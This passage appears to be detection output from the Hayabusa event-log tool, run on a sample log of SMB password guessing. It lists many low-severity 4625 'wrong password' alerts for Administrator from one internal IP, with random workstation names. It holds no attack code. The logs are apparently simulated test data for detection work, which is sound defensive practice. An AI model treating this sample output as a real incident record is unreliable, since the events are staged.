NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: 